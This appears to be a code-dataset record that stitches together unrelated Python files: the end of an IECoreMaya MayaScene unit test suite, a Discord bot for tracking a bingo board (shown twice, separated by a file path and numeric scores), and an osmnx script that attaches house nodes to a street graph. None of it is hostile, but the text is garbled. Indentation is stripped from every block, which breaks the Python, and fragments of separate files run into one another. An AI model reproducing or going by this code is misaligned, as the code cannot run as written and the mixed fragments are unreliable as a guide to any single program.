maya.cmds.setAttr( "transform1.tx", 0.1 )
maya.cmds.setAttr( "transform1.ty", 0.2 )
maya.cmds.setAttr( "transform1.tz", 0.3 )
maya.cmds.setAttr( "transform1.rx", 0.1 )
maya.cmds.setAttr( "transform1.ry", 0.2 )
maya.cmds.setAttr( "transform1.rz", 0.3 )
maya.cmds.setAttr( "transform1.sx", 0.1 )
maya.cmds.setAttr( "transform1.sy", 0.2 )
maya.cmds.setAttr( "transform1.sz", 0.3 )
sphere = maya.cmds.polySphere( name="pSphere1" )
maya.cmds.parent( "pSphere1", "transform1" )
maya.cmds.setAttr( "pSphere1.tx", 1 )
maya.cmds.setAttr( "pSphere1.ty", 2 )
maya.cmds.setAttr( "pSphere1.tz", 3 )
maya.cmds.setAttr( "pSphere1.rx", 10 )
maya.cmds.setAttr( "pSphere1.ry", 20 )
maya.cmds.setAttr( "pSphere1.rz", 30 )
maya.cmds.setAttr( "pSphere1.sx", 4 )
maya.cmds.setAttr( "pSphere1.sy", 5 )
maya.cmds.setAttr( "pSphere1.sz", 6 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "transform1" ).child( "pSphere1" )
# test it returns the correct transform in local space
maya.cmds.currentTime( "0.0sec" )
transform = transformChild.readTransform( 0 ).value
import math
self.assertAlmostEqual( transform.translate.x, 1, 5 )
self.assertAlmostEqual( transform.translate.y, 2, 5 )
self.assertAlmostEqual( transform.translate.z, 3, 5 )
self.assertAlmostEqual( transform.rotate.x * 180.0 / math.pi, 10.0, 5 )
self.assertAlmostEqual( transform.rotate.y * 180.0 / math.pi, 20.0, 5 )
self.assertAlmostEqual( transform.rotate.z * 180.0 / math.pi, 30.0, 5 )
self.assertAlmostEqual( transform.scale.x, 4, 5 )
self.assertAlmostEqual( transform.scale.y, 5, 5 )
self.assertAlmostEqual( transform.scale.z, 6, 5 )
self.assertEqual( transform.transform, transformChild.readTransformAsMatrix( 0 ) )
def testTimeException( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="0sec", v=1 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="0sec", v=2 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="0sec", v=3 )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="1sec", v=4 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="1sec", v=5 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="1sec", v=6 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pSphere1" )
# move to frame -1:
maya.cmds.currentTime( -1 )
# test it returns the correct transform in local space
self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 0.5 ) )
self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 1.0 ) )
def testAnimatedTransform( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="0sec", v=1 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="0sec", v=2 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="0sec", v=3 )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="1sec", v=4 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="1sec", v=5 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="1sec", v=6 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pSphere1" )
# test it returns the correct transform in local space
maya.cmds.currentTime( "0sec" )
transform0 = transformChild.readTransform( 0 ).value
maya.cmds.currentTime( "0.5sec" )
transform0_5 = transformChild.readTransform( 0.5 ).value
maya.cmds.currentTime( "1sec" )
transform1 = transformChild.readTransform( 1 ).value
self.assertEqual( transform0.translate, IECore.V3d( 1, 2, 3 ) )
self.assertAlmostEqual( transform0_5.translate.x, 2.5, 5 )
self.assertAlmostEqual( transform0_5.translate.y, 3.5, 5 )
self.assertAlmostEqual( transform0_5.translate.z, 4.5, 5 )
self.assertEqual( transform1.translate, IECore.V3d( 4, 5, 6 ) )
def testDeletedDagPath( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
maya.cmds.delete( "pSphere1" )
self.assertRaises( RuntimeError, IECore.curry( child.child, "pSphereShape1" ) )
self.assertRaises( RuntimeError, child.childNames )
self.assertRaises( RuntimeError, IECore.curry( child.hasChild, "asdd" ) )
self.assertRaises( RuntimeError, child.name )
self.assertRaises( RuntimeError, child.path )
self.assertRaises( RuntimeError, child.hasObject )
self.assertRaises( RuntimeError, IECore.curry( child.readBound, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( child.readObject, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( child.readTransform, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( child.readTransformAsMatrix, 0.0 ) )
# this doesn't need to throw an exception does it?
self.assertEqual( child.scene( [ "pSphere1", "pSphereShape1" ], IECore.SceneInterface.MissingBehaviour.NullIfMissing ), None )
# I guess this does...
self.assertRaises( RuntimeError, IECore.curry( child.scene, [ "pSphere1", "pSphereShape1" ] ) )
def testReadMesh( self ) :
# create a cube:
maya.cmds.polyCube( name = "pCube1" )
# transform a bit, so we can check it's returning the mesh in world space:
maya.cmds.setAttr( "pCube1.tx", 0.1 )
maya.cmds.setAttr( "pCube1.ty", 0.2 )
maya.cmds.setAttr( "pCube1.tz", 0.3 )
maya.cmds.setAttr( "pCube1.rx", 10 )
maya.cmds.setAttr( "pCube1.ry", 20 )
maya.cmds.setAttr( "pCube1.rz", 30 )
scene = IECoreMaya.MayaScene()
cube = scene.child( "pCube1" )
# read mesh at time 0:
maya.cmds.currentTime( "0.0sec" )
mesh = cube.readObject( 0 )
vertList = list( mesh["P"].data )
# check it's got the right length:
self.assertEqual( len( vertList ), 8 )
# check it's got the right verts:
self.assertEqual( vertList.count( IECore.V3f( -0.5, -0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, -0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( -0.5, 0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, 0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( -0.5, 0.5, -0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, 0.5, -0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( -0.5, -0.5, -0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, -0.5, -0.5 ) ), 1 )
# check read primvars
self.assertEqual( mesh["P"], cube.readObjectPrimitiveVariables( [ "P" ], 0 )["P"] )
def testAnimatedMesh( self ) :
cube = maya.cmds.polyCube( name = "pCube1" )
# create a skin cluster to animate vertex 0:
maya.cmds.select( cl=True )
maya.cmds.select( "pCube1.vtx[0]", r=True )
cluster = maya.mel.eval( 'newCluster "-envelope 1"' )[1]
maya.cmds.setKeyframe( cluster, attribute="tx", t="0sec" )
maya.cmds.setKeyframe( cluster, attribute="tx", t="1sec", v=-1 )
scene = IECoreMaya.MayaScene()
cube = scene.child( "pCube1" )
# read mesh at different times:
maya.cmds.currentTime( "0.0sec" )
mesh0 = cube.readObject( 0 )
maya.cmds.currentTime( "0.5sec" )
mesh0_5 = cube.readObject( 0.5 )
maya.cmds.currentTime( "1.0sec" )
mesh1 = cube.readObject( 1 )
# have we moved vertex 0?
self.assertEqual( mesh0["P"].data[0].x, -0.5 )
self.assertEqual( mesh0_5["P"].data[0].x, -1 )
self.assertEqual( mesh1["P"].data[0].x, -1.5 )
def testReadBound( self ) :
# create some cubes:
maya.cmds.polyCube( name = "pCube1" )
maya.cmds.polyCube( name = "pCube2" )
maya.cmds.polyCube( name = "pCube3" )
maya.cmds.polyCube( name = "pCube4" )
maya.cmds.parent( "pCube2", "pCube1" )
maya.cmds.parent( "pCube3", "pCube1" )
maya.cmds.setAttr( "pCube4.tx", 3 )
maya.cmds.setAttr( "pCube4.ty", 3 )
maya.cmds.setAttr( "pCube4.tz", 3 )
maya.cmds.setAttr( "pCube2.tx", 1 )
maya.cmds.setAttr( "pCube2.ty", 1 )
maya.cmds.setAttr( "pCube2.tz", 1 )
maya.cmds.setAttr( "pCube3.tx", -1 )
maya.cmds.setAttr( "pCube3.ty", -1 )
maya.cmds.setAttr( "pCube3.tz", -1 )
scene = IECoreMaya.MayaScene()
cube4Transform = scene.child( "pCube4" )
cube1Transform = scene.child( "pCube1" )
maya.cmds.currentTime( "0.0sec" )
self.assertEqual( scene.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 3.5, 3.5, 3.5 ) ) )
self.assertEqual( cube4Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
# check it's including its children:
self.assertEqual( cube1Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 1.5, 1.5, 1.5 ) ) )
maya.cmds.setAttr( "pCube1.tx", 1 )
maya.cmds.setAttr( "pCube1.ty", 1 )
maya.cmds.setAttr( "pCube1.tz", 1 )
# should be in object space!!!
self.assertEqual( cube1Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 1.5, 1.5, 1.5 ) ) )
cube2Transform = cube1Transform.child( "pCube2" )
self.assertEqual( cube2Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
cube3Transform = cube1Transform.child( "pCube3" )
self.assertEqual( cube3Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
def testAnimatedMeshBound( self ) :
# Currently fails, because I'm pulling on the boundingBox plugs at arbitrary
# times, and that doesn't work, although it kind of should!
maya.cmds.polyCube( name = "pCube2" )
# create a skin cluster to animate vertex 0:
maya.cmds.select( cl=True )
maya.cmds.select( "pCube2.vtx[0]", r=True )
cluster = maya.mel.eval( 'newCluster "-envelope 1"' )[1]
maya.cmds.setKeyframe( cluster, attribute="tx", t="0sec" )
maya.cmds.setKeyframe( cluster, attribute="tx", t="1sec", v=-1 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pCube2" )
maya.cmds.currentTime( "0.0sec" )
self.assertEqual( transformChild.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "0.5sec" )
self.assertEqual( transformChild.readBound( 0.5 ), IECore.Box3d( IECore.V3d( -1.0, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "1.0sec" )
self.assertEqual( transformChild.readBound( 1.0 ), IECore.Box3d( IECore.V3d( -1.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
def testAnimatedBound( self ) :
# Currently fails, because I'm pulling on the boundingBox plugs at arbitrary
# times, and that doesn't work, although it kind of should!
maya.cmds.polyCube( name = "pCube1" )
maya.cmds.createNode( "transform", name = "pCube1Parent" )
maya.cmds.parent( "pCube1", "pCube1Parent" )
maya.cmds.setKeyframe( "pCube1", attribute="tx", t="0sec", v=0 )
maya.cmds.setKeyframe( "pCube1", attribute="tx", t="1sec", v=-1 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pCube1Parent" )
maya.cmds.currentTime( "0.0sec" )
self.assertEqual( transformChild.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "0.5sec" )
self.assertEqual( transformChild.readBound( 0.5 ), IECore.Box3d( IECore.V3d( -1.0, -0.5, -0.5 ), IECore.V3d( 0.0, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "1.0sec" )
self.assertEqual( transformChild.readBound( 1.0 ), IECore.Box3d( IECore.V3d( -1.5, -0.5, -0.5 ), IECore.V3d( -0.5, 0.5, 0.5 ) ) )
def testCameraTransform( self ) :
# camera must be output with an identity transform, because of the hierarchical
# nature of this class...
scene = IECoreMaya.MayaScene()
cameraTransform = scene.child( "persp" )
maya.cmds.currentTime( "0.0sec" )
camera = cameraTransform.readObject( 0 )
# sanity check: camera transform is not identity?
self.assertNotEqual( cameraTransform.readTransformAsMatrix( 0 ), IECore.M44f() )
# this transform must be identity...
self.assertEqual( camera.getTransform().transform(), IECore.M44f() )
def testMeshChange( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
scene = IECoreMaya.MayaScene()
sphere = scene.child( "pSphere1" )
maya.cmds.currentTime( "0.0sec" )
mesh = sphere.readObject( 0 )
# should default to 382 verts:
self.assertEqual( len( mesh["P"].data ), 382 )
maya.cmds.setAttr( "polySphere1.subdivisionsAxis", 3 )
maya.cmds.setAttr( "polySphere1.subdivisionsHeight", 3 )
mesh = sphere.readObject( 0 )
# should be 8 verts now:
self.assertEqual( len( mesh["P"].data ), 8 )
def testWriteExceptions( self ) :
scene = IECoreMaya.MayaScene()
self.assertRaises( RuntimeError, IECore.curry( scene.writeBound, IECore.Box3d(), 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( scene.writeTransform, IECore.M44dData( IECore.M44d() ), 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( scene.writeAttribute, "asdfs", IECore.BoolData( False ), 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( scene.writeObject, IECore.SpherePrimitive(), 0.0 ) )
def testSceneShapeCustomReaders( self ):
# make sure we are at time 0
maya.cmds.currentTime( "0sec" )
scene = IECoreMaya.MayaScene()
envShape = str( IECoreMaya.FnSceneShape.create( "ieScene1" ).fullPathName() )
envNode = 'ieScene1'
envScene = scene.child( envNode )
self.assertFalse( envScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
maya.cmds.setAttr( envShape+'.file', 'test/IECore/data/sccFiles/environment.lscc',type='string' )
self.assertTrue( envScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
spheresShape = str( IECoreMaya.FnSceneShape.create( "ieScene2" ).fullPathName() )
spheresNode = 'ieScene2'
maya.cmds.setAttr( spheresShape+'.file', 'test/IECore/data/sccFiles/animatedSpheres.scc',type='string' )
self.assertEqual( set( scene.childNames() ).intersection([ envNode, spheresNode ]) , set( [ envNode, spheresNode ] ) )
self.assertTrue( IECore.LinkedScene.linkAttribute in envScene.attributeNames() )
self.assertEqual( envScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/environment.lscc'), "root":IECore.InternedStringVectorData() } ) )
self.assertFalse( envScene.hasObject() )
spheresScene = scene.child( spheresNode )
self.assertTrue( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertEqual( spheresScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData() } ) )
self.assertFalse( spheresScene.hasObject() )
# expand the scene
fnSpheres = IECoreMaya.FnSceneShape( spheresShape )
fnSpheres.expandAll()
self.assertFalse( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
leafScene = spheresScene.child("A").child("a")
self.assertTrue( leafScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
# When expanding, we connect the child time attributes to their scene shape parent time attribute to propagate time remapping. When checking for time remapping, the scene shape
# currently only checks the direct connection, so we have here time in the link attributes. Will have to look out for performance issues.
self.assertEqual( leafScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData([ 'A', 'a' ]), 'time':IECore.DoubleData( 0 ) } ) )
self.assertFalse( leafScene.hasObject() )
# expand scene to meshes
fnSpheres.convertAllToGeometry()
self.assertFalse( leafScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertTrue( leafScene.hasObject() )
self.assertTrue( isinstance( leafScene.readObject(0), IECore.MeshPrimitive) )
# test time remapped scene readers...
spheresShape = str( maya.cmds.createNode( 'ieSceneShape' ) )
maya.cmds.setAttr( spheresShape+'.file', 'test/IECore/data/sccFiles/animatedSpheres.scc',type='string' )
maya.cmds.setAttr( spheresShape+'.time', 24.0*10 )
spheresScene = scene.child( 'ieScene3' )
self.assertTrue( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertEqual( spheresScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData(), "time":IECore.DoubleData(10.0) } ) )
def testReadRootAttribute( self ):
maya.cmds.file( new=True, f=True )
# make sure we are at time 0
maya.cmds.currentTime( "0sec" )
scene = IECoreMaya.MayaScene()
# tests a bug where calling attributeNames at the root raised an exception
scene.attributeNames()
def testCustomTags( self ) :
t = maya.cmds.createNode( "transform" )
maya.cmds.select( clear = True )
sphere = maya.cmds.polySphere( name="pSphere" )
doTest = True
def hasMyTags( node, tag, tagFilter ) :
"""'archivable' should be on all transforms and 'renderable' only at shape transforms."""
if not doTest:
return False
if tag not in ( "renderable", "archivable" ) :
return False
if tag == "archivable" :
return True
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
return False
if not ( tagFilter & IECore.SceneInterface.TagFilter.LocalTag ) :
return False
if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
return False
return dagPath.fullPathName().endswith("Shape")
def readMyTags( node, tagFilter ) :
"""'archivable' should be on all transforms and 'renderable' only at shape transforms."""
if not doTest:
return []
result = [ "archivable" ]
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
return result
if tagFilter & IECore.SceneInterface.TagFilter.LocalTag and dagPath.apiType() == maya.OpenMaya.MFn.kMesh :
result.append( "renderable" )
return result
IECoreMaya.MayaScene.registerCustomTags( hasMyTags, readMyTags )
scene = IECoreMaya.MayaScene()
transformScene = scene.child(str(t))
sphereScene = scene.child('pSphere')
self.assertFalse( scene.hasTag( 'renderable' ) )
self.assertFalse( scene.hasTag( 'archivable' ) )
self.assertEqual( scene.readTags(), [] )
self.assertFalse( transformScene.hasTag( 'renderable' ) )
self.assertTrue( transformScene.hasTag( 'archivable' ) )
self.assertEqual( transformScene.readTags(), [ IECore.InternedString('archivable') ] )
self.assertEqual( set(sphereScene.readTags()), set([ IECore.InternedString('renderable'), IECore.InternedString('archivable') ]) )
self.assertEqual( set(sphereScene.readTags( IECore.SceneInterface.TagFilter.EveryTag )), set([ IECore.InternedString('renderable'), IECore.InternedString('archivable') ]) )
self.assertEqual( sphereScene.readTags( IECore.SceneInterface.TagFilter.AncestorTag ), [ IECore.InternedString('archivable') ] )
self.assertTrue( sphereScene.hasTag( 'renderable') )
self.assertTrue( sphereScene.hasTag( 'archivable') )
# Disable custom tag functions so they don't mess with other tests
doTest = False
def testCustomAttributes( self ) :
t = maya.cmds.createNode( "transform" )
maya.cmds.select( clear = True )
sphere = maya.cmds.polySphere( name="pSphere" )
maya.cmds.currentTime( "0sec" )
doTest = True
def myAttributeNames( node ) :
if not doTest:
return []
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
return ["transformAttribute"]
if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
return []
return ["shapeAttribute"]
def readMyAttribute( node, attr ) :
if not doTest:
return None
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
if attr == "shapeAttribute":
return None
return IECore.FloatData( 5 )
if attr == "transformAttribute":
return None
if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
return None
return IECore.StringData("mesh")
IECoreMaya.MayaScene.registerCustomAttributes( myAttributeNames, readMyAttribute )
scene = IECoreMaya.MayaScene()
transformScene = scene.child(str(t))
sphereScene = scene.child('pSphere')
self.assertEqual( scene.attributeNames(), [] )
self.assertEqual( scene.readAttribute("anyAttr", 0.0), None )
self.assertEqual( transformScene.attributeNames(), [ IECore.InternedString("transformAttribute") ] )
self.assertEqual( transformScene.hasAttribute("shapeAttribute"), False )
self.assertEqual( transformScene.readAttribute("shapeAttribute", 0.0), None )
self.assertEqual( transformScene.readAttribute( "transformAttribute", 0.0), IECore.FloatData(5) )
self.assertEqual( sphereScene.attributeNames(), [ IECore.InternedString('shapeAttribute') ] )
self.assertEqual( sphereScene.readAttribute( "shapeAttribute", 0.0), IECore.StringData("mesh") )
# Disable custom attribute functions so they don't mess with other tests
doTest = False
if __name__ == "__main__":
IECoreMaya.TestProgram( plugins = [ "ieCore" ] ) | 0.311322 | 0.251492 |
import discord
from discord.ext.commands import Bot as BotBase
from apscheduler.schedulers.asyncio import AsyncIOScheduler
from lib.bingo import Bingo
import asyncio
PREFIX = "-"
OWNER_IDS = []
class Bot(BotBase):
def __init__(self):
self.PREFIX = PREFIX
self.ready = False
self.guild = None
self.scheduler = AsyncIOScheduler()
super().__init__(command_prefix=PREFIX, owner_ids=OWNER_IDS)
def run(self, version):
self.VERSION = version
with open("lib/bot/token.0", "r", encoding="utf-8") as tf:
self.TOKEN = tf.read()
print("running bot...")
super().run(self.TOKEN, reconnect=True)
async def on_connect(self):
print("bot connected")
async def on_disconnect(self):
print("bot disconnected")
async def on_ready(self):
if (not self.ready):
self.ready = True
self.stdout = self.get_channel()
self.guild = self.get_guild()
await self.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
print("bot ready")
await self.change_presence(activity=discord.Game('-commands'))
else:
print("bot reconnected")
bot = Bot()
board = Bingo()
@bot.command(name='green')
async def green(ctx, letter, square: int):
if (square < 1 or square > 5):
await bot.stdout.send('Square not recognized, valid args are 1-5 inclusive.')
return
result = board.greenUpdate(letter, square)
if (result < 0):
await bot.stdout.send('The free space is already green!')
elif (result < 1):
await bot.stdout.send(f'{letter.upper()} {square} is already a green square!')
else:
await bot.stdout.send(f'{letter.upper()} {square} was succesfully changed from red to green!')
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='red')
async def red(ctx, letter, square: int):
if (square < 1 or square > 5):
await bot.stdout.send('Square not recognized, valid args are 1-5 inclusive.')
return
result = board.redUpdate(letter, square)
if (result < 0):
await bot.stdout.send('The free space is always green and cannot be changed to red!')
elif (result < 1):
await bot.stdout.send(f'{letter.upper()} {square} is already a red square!')
else:
await bot.stdout.send(f'{letter.upper()} {square} was succesfully changed from green to red!')
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='showboard')
async def showboard(ctx):
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='commands')
async def commands(ctx):
myEmbed = discord.Embed(title="Commands", description="Last updated 6/27/2021", color=0x00ff00)
myEmbed.add_field(name="Current Version", value=bot.VERSION, inline=False)
myEmbed.add_field(name="-green <letter> <square>", value="Change square on the board to green", inline=False)
myEmbed.add_field(name="-red <letter> <square>", value="Change square on the board to red", inline=False)
myEmbed.add_field(name="-showboard", value="Displays current board", inline=False)
myEmbed.add_field(name="-starttime", value="Shows when the current board was generated", inline=False)
myEmbed.add_field(name='-newboard', value='Creates a new board and discards the old one, cannot be undone', inline=False)
myEmbed.set_author(name="bendy")
await bot.stdout.send(embed=myEmbed)
@bot.command(name='starttime')
async def commands(ctx):
await bot.stdout.send(f'The current board was generated on {board.getStartDate()} at {board.getStartTime()} UTC.')
@bot.command(name='newboard')
async def newBoard(ctx):
await bot.stdout.send('This will create a new board which discards the old one and can NOT be undone, are you sure? (y/n)')
try:
message = await bot.wait_for('message', check=lambda m: m.author == ctx.author and m.channel == ctx.channel, timeout=30.0)
except asyncio.TimeoutError:
await bot.stdout.send('Response timed out, aborting.')
else:
if (message.content.lower() == 'y'):
await bot.stdout.send('Creating new board...')
global board
board.reset()
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
elif (message.content.lower() == 'n'):
await bot.stdout.send('The old board will be preserved')
else:
await bot.stdout.send('Response not recognized, aborting.') | lib/bot/__init__.py | import discord
from discord.ext.commands import Bot as BotBase
from apscheduler.schedulers.asyncio import AsyncIOScheduler
from lib.bingo import Bingo
import asyncio
PREFIX = "-"
OWNER_IDS = []
class Bot(BotBase):
def __init__(self):
self.PREFIX = PREFIX
self.ready = False
self.guild = None
self.scheduler = AsyncIOScheduler()
super().__init__(command_prefix=PREFIX, owner_ids=OWNER_IDS)
def run(self, version):
self.VERSION = version
with open("lib/bot/token.0", "r", encoding="utf-8") as tf:
self.TOKEN = tf.read()
print("running bot...")
super().run(self.TOKEN, reconnect=True)
async def on_connect(self):
print("bot connected")
async def on_disconnect(self):
print("bot disconnected")
async def on_ready(self):
if (not self.ready):
self.ready = True
self.stdout = self.get_channel()
self.guild = self.get_guild()
await self.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
print("bot ready")
await self.change_presence(activity=discord.Game('-commands'))
else:
print("bot reconnected")
bot = Bot()
board = Bingo()
@bot.command(name='green')
async def green(ctx, letter, square: int):
if (square < 1 or square > 5):
await bot.stdout.send('Square not recognized, valid args are 1-5 inclusive.')
return
result = board.greenUpdate(letter, square)
if (result < 0):
await bot.stdout.send('The free space is already green!')
elif (result < 1):
await bot.stdout.send(f'{letter.upper()} {square} is already a green square!')
else:
await bot.stdout.send(f'{letter.upper()} {square} was succesfully changed from red to green!')
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='red')
async def red(ctx, letter, square: int):
if (square < 1 or square > 5):
await bot.stdout.send('Square not recognized, valid args are 1-5 inclusive.')
return
result = board.redUpdate(letter, square)
if (result < 0):
await bot.stdout.send('The free space is always green and cannot be changed to red!')
elif (result < 1):
await bot.stdout.send(f'{letter.upper()} {square} is already a red square!')
else:
await bot.stdout.send(f'{letter.upper()} {square} was succesfully changed from green to red!')
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='showboard')
async def showboard(ctx):
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='commands')
async def commands(ctx):
myEmbed = discord.Embed(title="Commands", description="Last updated 6/27/2021", color=0x00ff00)
myEmbed.add_field(name="Current Version", value=bot.VERSION, inline=False)
myEmbed.add_field(name="-green <letter> <square>", value="Change square on the board to green", inline=False)
myEmbed.add_field(name="-red <letter> <square>", value="Change square on the board to red", inline=False)
myEmbed.add_field(name="-showboard", value="Displays current board", inline=False)
myEmbed.add_field(name="-starttime", value="Shows when the current board was generated", inline=False)
myEmbed.add_field(name='-newboard', value='Creates a new board and discards the old one, cannot be undone', inline=False)
myEmbed.set_author(name="bendy")
await bot.stdout.send(embed=myEmbed)
@bot.command(name='starttime')
async def commands(ctx):
await bot.stdout.send(f'The current board was generated on {board.getStartDate()} at {board.getStartTime()} UTC.')
@bot.command(name='newboard')
async def newBoard(ctx):
await bot.stdout.send('This will create a new board which discards the old one and can NOT be undone, are you sure? (y/n)')
try:
message = await bot.wait_for('message', check=lambda m: m.author == ctx.author and m.channel == ctx.channel, timeout=30.0)
except asyncio.TimeoutError:
await bot.stdout.send('Response timed out, aborting.')
else:
if (message.content.lower() == 'y'):
await bot.stdout.send('Creating new board...')
global board
board.reset()
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
elif (message.content.lower() == 'n'):
await bot.stdout.send('The old board will be preserved')
else:
await bot.stdout.send('Response not recognized, aborting.') | 0.40251 | 0.105948 |
import osmnx as ox
import networkx as nx
import json
import shapely.wkt
from shapely.geometry import LineString
print('reading previous stage results')
with open('tmp/houseNodes.json', encoding='utf-8') as f:
houseRawNodes=json.load(f)
for house in houseRawNodes:
if type(house['geometry']) == str:
house['geometry'] = shapely.wkt.loads(house['geometry'])
if type(house['toGeometry']) == str:
house['toGeometry'] = shapely.wkt.loads(house['toGeometry'])
G = ox.save_load.load_graphml('tmp_city.graphml')
print('adding edges')
new_edges = []
for house in houseRawNodes:
new_edges.append({
"from": house['closest'],
"to": house['osmid'],
"geometry": LineString([(house['geometry'].x, house['geometry'].y), (house['toGeometry'].x, house['toGeometry'].y)]),
"key": 0,
"107413303": 0,
"name": None,
"highway": "residential",
"oneway": False,
"length": 0,
"highway": "projected_footway",
"ref": None,
"maxspeed": None,
"lanes": None,
"bridge": None,
"junction": None,
"service": None,
"tunnel": None,
"access": None,
"width": None,
})
for edge in new_edges:
G.add_edge(
edge["from"],
edge["to"],
osmid=0,
highway=edge["highway"],
oneway=edge["oneway"],
length=edge["length"],
geometry=edge["geometry"]
)
# add back edge
G.add_edge(
edge["to"],
edge["from"],
osmid=0,
highway=edge["highway"],
oneway=edge["oneway"],
length=edge["length"],
geometry=edge["geometry"]
)
print('adding nodes')
new_nodes = []
for house in houseRawNodes:
new_nodes.append({
"osmid": house['osmid'],
"geometry": house['geometry'],
"tag": house['tag'],
"name": house['name'],
"addr": house['addr'],
"highway": None,
})
for node in new_nodes:
G.add_node(
node["osmid"],
y=node["geometry"].y,
x=node["geometry"].x,
osmid=node["osmid"],
tag=node["tag"],
name=node["name"],
addr=node["addr"]
)
print('saving full graph')
